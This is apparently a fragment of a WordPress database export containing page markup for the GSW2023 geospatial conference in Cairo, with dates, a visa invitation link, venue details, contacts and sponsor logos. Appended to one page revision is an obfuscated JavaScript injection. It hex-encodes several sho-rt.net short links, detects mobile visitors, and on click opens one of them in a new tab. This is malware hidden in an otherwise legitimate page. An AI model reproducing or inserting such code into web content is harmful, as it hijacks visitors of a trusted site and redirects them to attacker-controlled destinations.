countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-07-10 01:13:12','2023-07-10 01:13:12','',3066,'https://gsw2023.com/?p=4997',0,'revision','',0),
(4998,1,'2023-07-10 01:13:33','2023-07-10 01:13:33','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951606179{margin-top: 90px !important;}\"]<img class=\"alignnone size-medium wp-image-4987 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator 